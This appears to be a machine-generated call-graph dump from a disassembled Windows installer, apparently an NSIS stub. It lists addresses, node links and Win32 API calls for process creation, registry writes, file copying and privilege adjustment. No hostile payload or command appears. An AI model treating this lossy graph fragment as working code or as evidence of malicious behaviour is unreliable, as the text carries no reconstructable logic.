40585b 3244->3245 3246 40585f GetLastError 3244->3246 3245->3226 3246->3245 3248 406697 GetProcAddress 3247->3248 3249 40668d 3247->3249 3252 40586f 3248->3252 3253 406601 GetSystemDirectoryW 3249->3253 3251 406693 3251->3248 3251->3252 3252->3226 3254 406623 wsprintfW LoadLibraryExW 3253->3254 3254->3251 3907 404344 lstrcpynW lstrlenW 3908 403945 3909 403950 3908->3909 3910 403957 GlobalAlloc 3909->3910 3911 403954 3909->3911 3910->3911 3912 401e49 3913 402c1f 17 API calls 3912->3913 3914 401e4f 3913->3914 3915 402c1f 17 API calls 3914->3915 3916 401e5b 3915->3916 3917 401e72 EnableWindow 3916->3917 3918 401e67 ShowWindow 3916->3918 3919 402ac5 3917->3919 3918->3919 3920 40264a 3921 402c1f 17 API calls 3920->3921 3929 402659 3921->3929 3922 402796 3923 4026a3 ReadFile 3923->3922 3923->3929 3924 405e10 ReadFile 3924->3929 3925 4026e3 MultiByteToWideChar 3925->3929 3926 402798 3942 4061de wsprintfW 3926->3942 3929->3922 3929->3923 3929->3924 3929->3925 3929->3926 3930 402709 SetFilePointer MultiByteToWideChar 3929->3930 3931 4027a9 3929->3931 3933 405e6e SetFilePointer 3929->3933 3930->3929 3931->3922 3932 4027ca SetFilePointer 3931->3932 3932->3922 3934 405e8a 3933->3934 3939 405ea2 3933->3939 3935 405e10 ReadFile 3934->3935 3936 405e96 3935->3936 3937 405ed3 SetFilePointer 3936->3937 3938 405eab SetFilePointer 3936->3938 3936->3939 3937->3939 3938->3937 3940 405eb6 3938->3940 3939->3929 3941 405e3f WriteFile 3940->3941 3941->3939 3942->3922 3946 4016cc 3947 402c41 17 API calls 3946->3947 3948 4016d2 GetFullPathNameW 3947->3948 3950 4016ec 3948->3950 3955 40170e 3948->3955 3949 401723 GetShortPathNameW 3952 402ac5 3949->3952 3951 4065da 2 API calls 3950->3951 3950->3955 3953 4016fe 3951->3953 3953->3955 3956 406297 lstrcpynW 3953->3956 3955->3949 3955->3952 3956->3955 3957 4043cd 3958 4043e5 3957->3958 3964 4044ff 3957->3964 3965 40420e 18 API calls 3958->3965 3959 404569 3960 404633 3959->3960 3961 404573 GetDlgItem 3959->3961 3966 404275 8 API calls 3960->3966 3962 4045f4 3961->3962 3963 40458d 3961->3963 3962->3960 3972 404606 3962->3972 3963->3962 3971 4045b3 SendMessageW LoadCursorW SetCursor 3963->3971 3964->3959 3964->3960 3967 40453a GetDlgItem SendMessageW 3964->3967 3968 40444c 3965->3968 3970 40462e 3966->3970 3990 404230 KiUserCallbackDispatcher 3967->3990 3969 40420e 18 API calls 3968->3969 3974 404459 CheckDlgButton 3969->3974 3994 40467c 3971->3994 3976 40461c 3972->3976 3977 40460c SendMessageW 3972->3977 3988 404230 KiUserCallbackDispatcher 3974->3988 3976->3970 3981 404622 SendMessageW 3976->3981 3977->3976 3978 404564 3991 404658 3978->3991 3981->3970 3983 404477 GetDlgItem 3989 404243 SendMessageW 3983->3989 3985 40448d SendMessageW 3986 4044b3 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 3985->3986 3987 4044aa GetSysColor 3985->3987 3986->3970 3987->3986 3988->3983 3989->3985 3990->3978 3992 404666 3991->3992 3993 40466b SendMessageW 3991->3993 3992->3993 3993->3959 3997 4058c3 ShellExecuteExW 3994->3997 3996 4045e2 LoadCursorW SetCursor 3996->3962 3997->3996 3998 40234e 3999 402c41 17 API calls 3998->3999 4000 40235d 3999->4000 4001 402c41 17 API calls 4000->4001 4002 402366 4001->4002 4003 402c41 17 API calls 4002->4003 4004 402370 GetPrivateProfileStringW 4003->4004 4005 401b53 4006 402c41 17 API calls 4005->4006 4007 401b5a 4006->4007 4008 402c1f 17 API calls 4007->4008 4009 401b63 wsprintfW 4008->4009 4010 402ac5 4009->4010 4011 404a55 4012 404a81 4011->4012 4013 404a65 4011->4013 4015 404ab4 4012->4015 4016 404a87 SHGetPathFromIDListW 4012->4016 4022 4058e1 GetDlgItemTextW 4013->4022 4018 404a9e SendMessageW 4016->4018 4019 404a97 4016->4019 4017 404a72 SendMessageW 4017->4012 4018->4015 4021 40140b 2 API calls 4019->4021 4021->4018 4022->4017 4023 401956 4024 402c41 17 API calls 4023->4024 4025 40195d lstrlenW 4024->4025 4026 402592 4025->4026 4027 4014d7 4028 402c1f 17 API calls 4027->4028 4029 4014dd Sleep 4028->4029 4031 402ac5 4029->4031 3837 402259 3838 402c41 17 API calls 3837->3838 3839 40225f 3838->3839 3840 402c41 17 API calls 3839->3840 3841 402268 3840->3841 3842 402c41 17 API calls 3841->3842 3843 402271 3842->3843 3844 4065da 2 API calls 3843->3844 3845 40227a 3844->3845 3846 40228b lstrlenW lstrlenW 3845->3846 3847 40227e 3845->3847 3849 4052ff 24 API calls 3846->3849 3848 4052ff 24 API calls 3847->3848 3851 402286 3848->3851 3850 4022c9 SHFileOperationW 3849->3850 3850->3847 3850->3851 3852 40175c 3853 402c41 17 API calls 3852->3853 3854 401763 3853->3854 3855 405dbc 2 API calls 3854->3855 3856 40176a 3855->3856 3857 405dbc 2 API calls 3856->3857 3857->3856 4032 401d5d GetDlgItem GetClientRect 4033 402c41 17 API calls 4032->4033 4034 401d8f LoadImageW SendMessageW 4033->4034 4035 402ac5 4034->4035 4036 401dad DeleteObject 4034->4036 4036->4035 4037 4022dd 4038 4022e4 4037->4038 4041 4022f7 4037->4041 4039 4062b9 17 API calls 4038->4039 4040 4022f1 4039->4040 4042 4058fd MessageBoxIndirectW 4040->4042 4042->4041 4043 401563 4044 402a6b 4043->4044 4047 4061de wsprintfW 4044->4047 4046 402a70 4047->4046 3260 4023e4 3261 402c41 17 API calls 3260->3261 3262 4023f6 3261->3262 3263 402c41 17 API calls 3262->3263 3264 402400 3263->3264 3277 402cd1 3264->3277 3267 402ac5 3268 402438 3269 402444 3268->3269 3301 402c1f 3268->3301 3272 402463 RegSetValueExW 3269->3272 3281 403116 3269->3281 3270 402c41 17 API calls 3273 40242e lstrlenW 3270->3273 3275 402479 RegCloseKey 3272->3275 3273->3268 3275->3267 3278 402cec 3277->3278 3304 406132 3278->3304 3282 40312f 3281->3282 3283 40315d 3282->3283 3311 403324 SetFilePointer 3282->3311 3308 40330e 3283->3308 3287 4032a7 3290 4032e9 3287->3290 3293 4032ab 3287->3293 3288 40317a GetTickCount 3289 403291 3288->3289 3297 4031a6 3288->3297 3289->3272 3292 40330e ReadFile 3290->3292 3291 40330e ReadFile 3291->3297 3292->3289 3293->3289 3294 40330e ReadFile 3293->3294 3295 405e3f WriteFile 3293->3295 3294->3293 3295->3293 3296 4031fc GetTickCount 3296->3297 3297->3289 3297->3291 3297->3296 3298 403221 MulDiv wsprintfW 3297->3298 3300 405e3f WriteFile 3297->3300 3299 4052ff 24 API calls 3298->3299 3299->3297 3300->3297 3302 4062b9 17 API calls 3301->3302 3303 402c34 3302->3303 3303->3269 3305 406141 3304->3305 3306 402410 3305->3306 3307 40614c RegCreateKeyExW 3305->3307 3306->3267 3306->3268 3306->3270 3307->3306 3309 405e10 ReadFile 3308->3309 3310 403168 3309->3310 3310->3287 3310->3288 3310->3289 3311->3283 3357 402868 3358 402c41 17 API calls 3357->3358 3359 40286f FindFirstFileW 3358->3359 3360 402897 3359->3360 3363 402882 3359->3363 3365 4061de wsprintfW 3360->3365 3362 4028a0 3366 406297 lstrcpynW 3362->3366 3365->3362 3366->3363 4048 401968 4049 402c1f 17 API calls 4048->4049 4050 40196f 4049->4050 4051 402c1f 17 API calls 4050->4051 4052 40197c 4051->4052 4053 402c41 17 API calls 4052->4053 4054 401993 lstrlenW 4053->4054 4055 4019a4 4054->4055 4059 4019e5 4055->4059 4060 406297 lstrcpynW 4055->4060 4057 4019d5 4058 4019da lstrlenW 4057->4058 4057->4059 4058->4059 4060->4057 4061 40166a 4062 402c41 17 API calls 4061->4062 4063 401670 4062->4063 4064 4065da 2 API calls 4063->4064 4065 401676 4064->4065 3367 40336c SetErrorMode GetVersion 3368 4033ab 3367->3368 3369 4033b1 3367->3369 3370 406671 5 API calls 3368->3370 3371 406601 3 API calls 3369->3371 3370->3369 3372 4033c7 lstrlenA 3371->3372 3372->3369 3373 4033d7 3372->3373 3374 406671 5 API calls 3373->3374 3375 4033de 3374->3375 3376 406671 5 API calls 3375->3376 3377 4033e5 3376->3377 3378 406671 5 API calls 3377->3378 3379 4033f1 #17 OleInitialize SHGetFileInfoW 3378->3379 3457 406297 lstrcpynW 3379->3457 3382 40343d GetCommandLineW 3458 406297 lstrcpynW 3382->3458 3384 40344f 3385 405b99 CharNextW 3384->3385 3386 403474 CharNextW 3385->3386 3387 40359e GetTempPathW 3386->3387 3398 40348d 3386->3398 3459 40333b 3387->3459 3389 4035b6 3390 403610 DeleteFileW 3389->3390 3391 4035ba GetWindowsDirectoryW lstrcatW 3389->3391 3469 402edd GetTickCount GetModuleFileNameW 3390->3469 3392 40333b 12 API calls 3391->3392 3395 4035d6 3392->3395 3393 405b99 CharNextW 3393->3398 3395->3390 3397 4035da GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3395->3397 3396 403624 3405 405b99 CharNextW 3396->3405 3439 4036c7 3396->3439 3452 4036d7 3396->3452 3399 40333b 12 API calls 3397->3399 3398->3393 3400 403589 3398->3400 3401 403587 3398->3401 3403 403608 3399->3403 3553 406297 lstrcpynW 3400->3553 3401->3387 3403->3390 3403->3452 3422 403643 3405->3422 3408 403811 3411 403895 ExitProcess 3408->3411 3412 403819 GetCurrentProcess OpenProcessToken 3408->3412 3409 4036f1 3563 4058fd 3409->3563 3417 403831 LookupPrivilegeValueW AdjustTokenPrivileges 3412->3417 3418 403865 3412->3418 3415 4036a1 3419 405c74 18 API calls 3415->3419 3416 403707 3420 405868 5 API calls 3416->3420 3417->3418 3421 406671 5 API calls 3418->3421 3423 4036ad 3419->3423 3424 40370c lstrcatW 3420->3424 3434 40386c 3421->3434 3422->3415 3422->3416 3423->3452 3554 406297 lstrcpynW 3423->3554 3425 403728 lstrcatW lstrcmpiW 3424->3425 3426 40371d lstrcatW 3424->3426 3429 403744 3425->3429 3425->3452 3426->3425 3427 403881 ExitWindowsEx 3427->3411 3430 40388e 3427->3430 3432 403750 3429->3432 3433 403749 3429->3433 3569 40140b 3430->3569 3431 4036bc 3555 406297 lstrcpynW 3431->3555 3438 40584b 2 API calls 3432->3438 3437 4057ce 4 API calls 3433->3437 3434->3427 3434->3430 3440 40374e 3437->3440 3441 403755 SetCurrentDirectoryW 3438->3441 3497 403987 3439->3497 3440->3441 3442 403770 3441->3442 3443 403765 3441->3443 3568 406297 lstrcpynW 3442->3568 3567 406297 lstrcpynW 3443->3567 3446 4062b9 17 API calls 3447 4037af DeleteFileW 3446->3447 3448 4037bc CopyFileW 3447->3448 3454 40377e 3447->3454 3448->3454 3449 403805 3450 40605d 36 API calls 3449->3450 3450->3452 3451 40605d 36 API calls 3451->3454 3556 4038ad 3452->3556 3453 4062b9 17 API calls 3453->3454 3454->3446 3454->3449 3454->3451 3454->3453 3455 405880 2 API calls 3454->3455 3456 4037f0 CloseHandle 3454->3456 3455->3454 3456->3454 3457->3382 3458->3384 3460 40652b 5 API calls 3459->3460 3462 403347 3460->3462 3461 403351 3461->3389 3462->3461 3463 405b6c 3 API calls 3462->3463 3464 403359 3463->3464 3465 40584b 2 API calls 3464->3465 3466 40335f 3465->3466 3572 405dbc 3466->3572 3576 405d8d GetFileAttributesW CreateFileW 3469->3576 3471 402f1d 3496 402f2d 3471->3496 3577 406297 lstrcpynW 3471->3577 3473 402f43 3474 405bb8 2 API calls 3473->3474 3475 402f49 3474->3475 3578 406297 lstrcpynW 3475->3578 3477 402f54 GetFileSize 3492 403050 3477->3492 3495 402f6b 3477->3495 3479 403059 3481 403089 GlobalAlloc 3479->3481 3479->3496 3591 403324 SetFilePointer 3479->3591 3480 40330e ReadFile 3480->3495 3590 403324 SetFilePointer 3481->3590 3484 4030bc 3486 402e79 6 API calls 3484->3486 3485 4030a4 3488 403116 31 API calls 3485->3488 3486->3496 3487 403072 3489 40330e ReadFile 3487->3489 3493 4030b0 3488->3493 3491 40307d 3489->3491 3490 402e79 6 API calls 3490->3495 3491->3481 3491->3496 3579 402e79 3492->3579 3493->3493 3494 4030ed SetFilePointer 3493->3494 3493->3496 3494->3496 3495->3480 3495->3484 3495->3490 3495->3492 3495->3496 3496->3396 3498 406671 5 API calls 3497->3498 3499 40399b 3498->3499 3500 4039a1 3499->3500 3501 4039b3 3499->3501 3607 4061de wsprintfW 3500->3607 3502 406165 3 API calls 3501->3502 3503 4039e3 3502->3503 3505 403a02 lstrcatW 3503->3505 3507 406165 3 API calls 3503->3507 3506 4039b1 3505->3506 3592 403c5d 3506->3592 3507->3505 3510 405c74 18 API calls 3511 403a34 3510->3511 3512 403ac8 3511->3512 3514 406165 3 API calls 3511->3514 3513 405c74 18 API calls 3512->3513 3515 403ace 3513->3515 3517 403a66 3514->3517 3516 403ade LoadImageW 3515->3516 3518 4062b9 17 API calls 3515->3518 3519 403b84 3516->3519 3520 403b05 RegisterClassW 3516->3520 3517->3512 3521 403a87 lstrlenW 3517->3521 3524 405b99 CharNextW 3517->3524 3518->3516 3523 40140b 2 API calls 3519->3523 3522 403b3b SystemParametersInfoW CreateWindowExW 3520->3522 3552 403b8e 3520->3552 3525 403a95 lstrcmpiW 3521->3525 3526 403abb 3521->3526 3522->3519 3527 403b8a 3523->3527 3528 403a84 3524->3528 3525->3526 3529 403aa5 GetFileAttributesW 3525->3529 3530 405b6c 3 API calls 3526->3530 3532 403c5d 18 API calls 3527->3532 3527->3552 3528->3521 3531 403ab1 3529->3531 3533 403ac1 3530->3533 3531->3526 3534 405bb8 2 API calls 3531->3534 3535 403b9b 3532->3535 3608 406297 lstrcpynW 3533->3608 3534->3526 3537 403ba7 ShowWindow 3535->3537 3538 403c2a 3535->3538 3539 406601 3 API calls 3537->3539 3600 4053d2 OleInitialize 3538->3600 3541 403bbf 3539->3541 3543 403bcd GetClassInfoW 3541->3543 3546 406601 3 API calls 3541->3546 3542 403c30 3544 403c34 3542->3544 3545 403c4c 3542->3545 3548 403be1 GetClassInfoW RegisterClassW 3543->3548 3549 403bf7 DialogBoxParamW 3543->3549 3550 40140b 2 API calls 3544->3550 3544->3552 3547 40140b 2 API calls 3545->3547 3546->3543 3547->3552 3548->3549 3551 40140b 2 API calls 3549->3551 3550->3552 3551->3552 3552->3452 3553->3401 3554->3431 3555->3439 3557 4038c5 3556->3557 3558 4038b7 CloseHandle 3556->3558 3620 4038f2 3557->3620 3558->3557 3561 4059a9 67 API calls 3562 4036e0 OleUninitialize 3561->3562 3562->3408 3562->3409 3564 405912 3563->3564 3565 4036ff ExitProcess 3564->3565 3566 405926 MessageBoxIndirectW 3564->3566 3566->3565 3567->3442 3568->3454 3570 401389 2 API calls 3569->3570 3571 401420 3570->3571 3571->3411 3573 405dc9 GetTickCount GetTempFileNameW 3572->3573 3574 40336a 3573->3574 3575 405dff 3573->3575 3574->3389 3575->3573 3575->3574 3576->3471 3577->3473 3578->3477 3580 402e82 3579->3580 3581 402e9a 3579->3581 3584 402e92 3580->3584 3585 402e8b DestroyWindow 3580->3585 3582 402ea2 3581->3582 3583 402eaa GetTickCount 3581->3583 3586 4066ad 2 API calls 3582->3586 3587 402eb8 CreateDialogParamW ShowWindow 3583->3587 3588 402edb 3583->3588 3584->3479 3585->3584 3589 402ea8 3586->3589 3587->3588 3588->3479 3589->3479 3590->3485 3591->3487 3593 403c71 3592->3593 3609 4061de wsprintfW 3593->3609 3595 403ce2 3610 403d16 3595->3610 3597 403a12 3597->3510 3598 403ce7 3598->3597 3599 4062b9 17 API calls 3598->3599 3599->3598 3613 40425a 3600->3613 3602 40541c 3603 40425a SendMessageW 3602->3603 3605 40542e CoUninitialize 3603->3605 3604 4053f5 3604->3602 3616 401389 3604->3616 3605->3542 3607->3506 3608->3512 3609->3595 3611 4062b9 17 API calls 3610->3611 3612 403d24 SetWindowTextW 3611->3612 3612->3598 3614 404272 3613->3614 3615 404263 SendMessageW 3613->3615 3614->3604 3615->3614 3618 401390 3616->3618 3617 4013fe 3617->3604 3618->3617 3619 4013cb MulDiv SendMessageW 3618->3619 3619->3618 3621 403900 3620->3621 3622 4038ca 3621->3622 3623 403905 FreeLibrary GlobalFree 3621->3623 3622->3561 3623->3622 3623->3623 3663 40176f 3664 402c41 17 API calls 3663->3664 3665 401776 3664->3665 3666 401796 3665->3666 3667 40179e 3665->3667 3702 406297 lstrcpynW 3666->3702 3703 406297 lstrcpynW 3667->3703 3670 4017a9 3672 405b6c 3 API calls 3670->3672 3671 40179c 3674 40652b 5 API calls 3671->3674 3673 4017af lstrcatW 3672->3673 3673->3671 3690 4017bb 3674->3690 3675 4065da 2 API calls 3675->3690 3677 405d68 2 API calls 3677->3690 3678 4017cd CompareFileTime 3678->3690 3679 40188d 3681 4052ff 24 API calls 3679->3681 3680 401864 3682 4052ff 24 API calls 3680->3682 3691 401879 3680->3691 3684 401897 3681->3684 3682->3691 3683 406297 lstrcpynW 3683->3690 3685 403116 31 API calls 3684->3685 3686 4018aa 3685->3686 3687 4018be SetFileTime 3686->3687 3689 4018d0 CloseHandle 3686->3689 3687->3689 3688 4062b9 17 API calls 3688->3690 3689->3691 3692 4018e1 3689->3692 3690->3675 3690->3677 3690->3678 3690->3679 3690->3680 3690->3683 3690->3688 3699 4058fd MessageBoxIndirectW 3690->3699 3701 405d8d GetFileAttributesW CreateFileW 3690->3701 3693 4018e6 3692->3693 3694 4018f9 3692->3694 3695 4062b9 17 API calls 3693->3695 3696 4062b9 17 API calls 3694->3696 3697 4018ee lstrcatW 3695->3697 3698 401901 3696->3698 3697->3698 3700 4058fd MessageBoxIndirectW 3698->3700 3699->3690 3700->3691 3701->3690 3702->3671 3703->3670 4066 4027ef 4067 4027f6 4066->4067 4069 402a70 4066->4069 4068 402c1f 17 API calls 4067->4068 4070 4027fd 4068->4070 4071 40280c SetFilePointer 4070->4071 4071->4069 4072 40281c 4071->4072 4074 4061de wsprintfW 4072->4074 4074->4069 4075 401a72 4076 402c1f 17 API calls 4075->4076 4077 401a7b 4076->4077 4078 402c1f 17 API calls 4077->4078 4079 401a20 4078->4079 3727 401573 3728 401583 ShowWindow 3727->3728 3729 40158c 3727->3729 3728->3729 3730 402ac5 3729->3730 3731 40159a ShowWindow 3729->3731 3731->3730 4080 405273 4081 405283 4080->4081 4082 405297 4080->4082 4083 405289 4081->4083 4092 4052e0 4081->4092 4084 40529f IsWindowVisible 4082->4084 4088 4052b6 4082->4088 4086 40425a SendMessageW 4083->4086 4087 4052ac 4084->4087 4084->4092 4085 4052e5 CallWindowProcW 4089 405293 4085->4089 4086->4089 4093 404bc9 SendMessageW 4087->4093 4088->4085 4098 404c49 4088->4098 4092->4085 4094 404c28 SendMessageW 4093->4094 4095 404bec GetMessagePos ScreenToClient SendMessageW 4093->4095 4097 404c20 4094->4097 4096 404c25 4095->4096 4095->4097 4096->4094 4097->4088 4107 406297 lstrcpynW 4098->4107 4100 404c5c 4108 4061de wsprintfW 4100->4108 4102 404c66 4103 40140b 2 API calls 4102->4103 4104 404c6f 4103->4104 4109 406297 lstrcpynW 4104->4109 4106 404c76 4106->4092 4107->4100 4108->4102 4109->4106 4110 402df3 4111 402e05 SetTimer 4110->4111 4113 402e1e 4110->4113 4111->4113 4112 402e73 4113->4112 4114 402e38 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4113->4114 4114->4112 4115 401cf3 4116 402c1f 17 API calls 4115->4116 4117 401cf9 IsWindow 4116->4117 4118 401a20 4117->4118 4119 4014f5 SetForegroundWindow 4120 402ac5 4119->4120 4121 402576 4122 402c41 17 API calls 4121->4122 4123 40257d 4122->4123 4126 405d8d GetFileAttributesW CreateFileW 4123->4126 4125 402589 4126->4125 4127 401b77 4128 401b84 4127->4128 4129 401bc8 4127->4129 4132 4022e4 4128->4132 4137 401b9b 4128->4137 4130 401bf2 GlobalAlloc 4129->4130 4131 401bcd 4129->4131 4133 4062b9 17 API calls 4130->4133 4142 401c0d 4131->4142 4148 406297 lstrcpynW 4131->4148 4134 4062b9 17 API calls 4132->4134 4133->4142 4136 4022f1 4134->4136 4140 4058fd MessageBoxIndirectW 4136->4140 4146 406297 lstrcpynW 4137->4146 4138 401bdf GlobalFree 4138->4142 4140->4142 4141 401baa 4147 406297 lstrcpynW 4141->4147 4144 401bb9 4149 406297 lstrcpynW 4144->4149 4146->4141 4147->4144 4148->4138 4149->4142 3826 4024f8 3827 402c81 17 API calls 3826->3827 3828 402502 3827->3828 3829 402c1f 17 API calls 3828->3829 3830 40250b 3829->3830 3831 402533 RegEnumValueW 3830->3831 3832 402527 RegEnumKeyW 3830->3832 3835 40288b 3830->3835 3833 40254f RegCloseKey 3831->3833 3834 402548 3831->3834 3832->3833 3833->3835 3834->3833 4150 401ffa 4151 402005 4150->4151 4152 402018 4151->4152 4154 402026 4151->4154 4174 4061de wsprintfW 4151->4174 4152->4154 4175 4061de wsprintfW 4152->4175 4156 4020f6 4154->4156 4157 402c41 17 API calls 4154->4157 4158 401423 24 API calls 4156->4158 4159 40204b 4157->4159 4165 402250 4158->4165 4160 402c41 17 API calls 4159->4160 4161 402054 4160->4161 4162 40206a LoadLibraryExW 4161->4162 4163 40205c GetModuleHandleW 4161->4163 4162->4156 4164 40207b 4162->4164 4163->4162 4163->4164 4166 4066e0 2 API calls 4164->4166 4167 402086 4166->4167 4168 4020c5 4167->4168 4169 40208c 4167->4169 4170 40209c 4168->4170 4171 4052ff 24 API calls 4168->4171 4169->4170 4172 401423 24 API calls 4169->4172 4170->4165 4173 4020e8 FreeLibrary 4170->4173 4171->4170 4172->4170 4173->4165 4174->4152 4175->4154 4176 40167b 4177 402c41 17 API calls 4176->4177 4178 401682 4177->4178 4179 402c41 17 API calls 4178->4179 4180 40168b 4179->4180 4181 402c41 17 API calls 4180->4181 4182 401694 MoveFileW 4181->4182 4183 4016a0 4182->4183 4184 4016a7 4182->4184 4186 401423 24 API calls 4183->4186 4185 4065da 2 API calls 4184->4185 4188 402250 4184->4188 4187 4016b6 4185->4187 4186->4188 4187->4188 4189 40605d 36 API calls 4187->4189 4189->4183 4190 404c7b GetDlgItem GetDlgItem 4191 404ccd 7 API calls 4190->4191 4197 404ee6 4190->4197 4192 404d70 DeleteObject 4191->4192 4193 404d63 SendMessageW 4191->4193 4194 404d79 4192->4194 4193->4192 4195 404db0 4194->4195 4196 4062b9 17 API calls 4194->4196 4198 40420e 18 API calls 4195->4198 4200 404d92 SendMessageW SendMessageW 4196->4200 4203 404fca 4197->4203 4208 404bc9 5 API calls 4197->4208 4224 404f57 4197->4224 4202 404dc4 4198->4202 4199 405076 4201 405080 SendMessageW 4199->4201 4207 405088 4199->4207 4200->4194 4201->4207 4209 40420e 18 API calls 4202->4209 4203->4199 4204 404ed9 4203->4204 4210 405023 SendMessageW 4203->4210 4205 404275 8 API calls 4204->4205 4211 40526c 4205->4211 4206 404fbc SendMessageW 4206->4203 4212 4050a1 4207->4212 4213 40509a ImageList_Destroy 4207->4213 4220 4050b1 4207->4220 4208->4224 4225 404dd2 4209->4225 4210->4204 4215 405038 SendMessageW 4210->4215 4216 4050aa GlobalFree 4212->4216 4212->4220 4213->4212 4214 405220 4214->4204 4221 405232 ShowWindow GetDlgItem ShowWindow 4214->4221 4218 40504b 4215->4218 4216->4220 4217 404ea7 GetWindowLongW SetWindowLongW 4219 404ec0 4217->4219 4226 40505c SendMessageW 4218->4226 4222 404ec6 ShowWindow 4219->4222 4223 404ede 4219->4223 4220->4214 4233 404c49 4 API calls 4220->4233 4237 4050ec 4220->4237 4221->4204 4241 404243 SendMessageW 4222->4241 4242 404243 SendMessageW 4223->4242 4224->4203 4224->4206 4225->4217 4227 404ea1 4225->4227 4230 404e22 SendMessageW 4225->4230 4231 404e5e SendMessageW 4225->4231 4232 404e6f SendMessageW 4225->4232 4226->4199 4227->4217 4227->4219 4230->4225 4231->4225 4232->4225 4233->4237 4234 4051f6 InvalidateRect 4234->4214 4235 40520c 4234->4235 4243 404b84 4235->4243 4236 40511a SendMessageW 4240 405130 4236->4240 4237->4236 4237->4240 4239 4051a4 SendMessageW SendMessageW 4239->4240 4240->4234 4240->4239 4241->4204 4242->4197 4246 404abb 4243->4246 4245 404b99 4245->4214 4247 404ad4 4246->4247 4248 4062b9 17 API calls 4247->4248 4249 404b38 4248->4249 4250 4062b9 17 API calls 4249->4250 4251 404b43 4250->4251 4252 4062b9 17 API calls 4251->4252 4253 404b59 lstrlenW wsprintfW SetDlgItemTextW 4252->4253 4253->4245 4254 401e7d 4255 402c41 17 API calls 4254->4255 4256 401e83 4255->4256 4257 402c41 17 API calls 4256->4257 4258 401e8c 4257->4258 4259 402c41 17 API calls 4258->4259 4260 401e95 4259->4260 4261 402c41 17 API calls 4260->4261 4262 401e9e 4261->4262 4263 401423 24 API calls 4262->4263 4264 401ea5 4263->4264 4271 4058c3 ShellExecuteExW 4264->4271 4266 401ee7 4267 406722 5 API calls 4266->4267 4269 40288b 4266->4269 4268 401f01 CloseHandle 4267->4268 4268->4269 4271->4266 4272 40437e lstrlenW 4273 40439d 4272->4273 4274 40439f WideCharToMultiByte 4272->4274 4273->4274 4275 4019ff 4276 402c41 17 API calls 4275->4276 4277 401a06 4276->4277 4278 402c41 17 API calls 4277->4278 4279 401a0f 4278->4279 4280 401a16 lstrcmpiW 4279->4280 4281 401a28 lstrcmpW 4279->4281 4282 401a1c 4280->4282 4281->4282 4283 4046ff 4284 40472b 4283->4284 4285 40473c 4283->4285 4344 4058e1 GetDlgItemTextW 4284->4344 4287 404748 GetDlgItem 4285->4287 4288 4047a7 4285->4288 4291 40475c 4287->4291 4289 40488b 4288->4289 4296 4062b9 17 API calls 4288->4296 4342 404a3a 4288->4342 4289->4342 4346 4058e1 GetDlgItemTextW 4289->4346 4290 404736 4292 40652b 5 API calls 4290->4292 4294 404770 SetWindowTextW 4291->4294 4295 405c17 4 API calls 4291->4295 4292->4285 4298 40420e 18 API calls 4294->4298 4300 404766 4295->4300 4301 40481b SHBrowseForFolderW 4296->4301 4297 4048bb 4302 405c74 18 API calls 4297->4302 4303 40478c 4298->4303 4299 404275 8 API calls 4304 404a4e 4299->4304 4300->4294 4307 405b6c 3 API calls 4300->4307 4301->4289 4305 404833 CoTaskMemFree 4301->4305 4309 4048c1 4302->4309 4306 40420e 18 API calls 4303->4306 4308 405b6c 3 API calls 4305->4308 4310 40479a 4306->4310 4307->4294 4311 404840 4308->4311 4347 406297 lstrcpynW 4309->4347 4345 404243 SendMessageW 4310->4345 4314 404877 SetDlgItemTextW 4311->4314 4319 4062b9 17 API calls 4311->4319 4314->4289 4315 4047a0 4317 406671 5 API calls 4315->4317 4316 4048d8 4318 406671 5 API calls 4316->4318 4317->4288 4325 4048df 4318->4325 4320 40485f lstrcmpiW 4319->4320 4320->4314 4323 404870 lstrcatW 4320->4323 4321 404920 4348 406297 lstrcpynW 4321->4348 4323->4314 4324 404927 4326 405c17 4 API calls 4324->4326 4325->4321 4329 405bb8 2 API calls 4325->4329 4331 404978 4325->4331 4327 40492d GetDiskFreeSpaceW 4326->4327 4330 404951 MulDiv 4327->4330 4327->4331 4329->4325 4330->4331 4332 4049e9 4331->4332 4334 404b84 20 API calls 4331->4334 4333 404a0c 4332->4333 4335 40140b 2 API calls 4332->4335 4349 404230 KiUserCallbackDispatcher 4333->4349 4336 4049d6 4334->4336 4335->4333 4338 4049eb SetDlgItemTextW 4336->4338 4339 4049db 4336->4339 4338->4332 4341 404abb 20 API calls 4339->4341 4340 404a28 4340->4342 4343 404658 SendMessageW 4340->4343 4341->4332 4342->4299 4343->4342 4344->4290 4345->4315 4346->4297 4347->4316 4348->4324 4349->4340 4350 401000 4351 401037 BeginPaint GetClientRect 4350->4351 4352 40100c DefWindowProcW 4350->4352 4354 4010f3 4351->4354 4355 401179 4352->4355 4356 401073 CreateBrushIndirect FillRect DeleteObject 4354->4356 4357 4010fc 4354->4357 4356->4354 4358 401102 CreateFontIndirectW 4357->4358 4359 401167 EndPaint 4357->4359 4358->4359 4360 401112 6 API calls 4358->4360 4359->4355 4360->4359 4361 401503 4362 40150b 4361->4362 4364 40151e 4361->4364 4363 402c1f 17 API calls 4362->4363 4363->4364 3312 402484 3323 402c81 3312->3323 3315 402c41 17 API calls 3316 402497 3315->3316 3317 4024a2 RegQueryValueExW 3316->3317 3318 40288b 3316->3318 3319 4024c2 3317->3319 3320 4024c8 RegCloseKey 3317->3320 3319->3320 3328 4061de wsprintfW 3319->3328 3320->3318 3324 402c41 17 API calls 3323->3324 3325 402c98 3324->3325 3326 406104 RegOpenKeyExW 3325->3326 3327 40248e 3326->3327 3327->3315 3328->3320 4365 402104 4366 402c41 17 API calls 4365->4366 4367 40210b 4366->4367 4368 402c41 17 API calls 4367->4368 4369 402115 4368->4369 4370 402c41 17 API calls 4369->4370 4371 40211f 4370->4371 4372 402c41 17 API calls 4371->4372 4373 402129 4372->4373 4374 402c41 17 API calls 4373->4374 4376 402133 4374->4376 4375 402172 CoCreateInstance 4378 402191 4375->4378 4376->4375 4377 402c41 17 API calls 4376->4377 4377->4375 4379 401423 24 API calls 4378->4379 4380 402250 4378->4380 4379->4380 3329 401f06 3330 402c41 17 API calls 3329->3330 3331 401f0c 3330->3331 3332 4052ff 24 API calls 3331->3332 3333 401f16 3332->3333 3344 405880 CreateProcessW 3333->3344 3338 401f31 3340 401f41 3338->3340 3341 401f36 3338->3341 3339 40288b 3343 401f3f CloseHandle 3340->3343 3352 4061de wsprintfW 3341->3352 3343->3339 3345 4058b3 CloseHandle 3344->3345 3346 401f1c 3344->3346 3345->3346 3346->3339 3346->3343 3347 406722 WaitForSingleObject 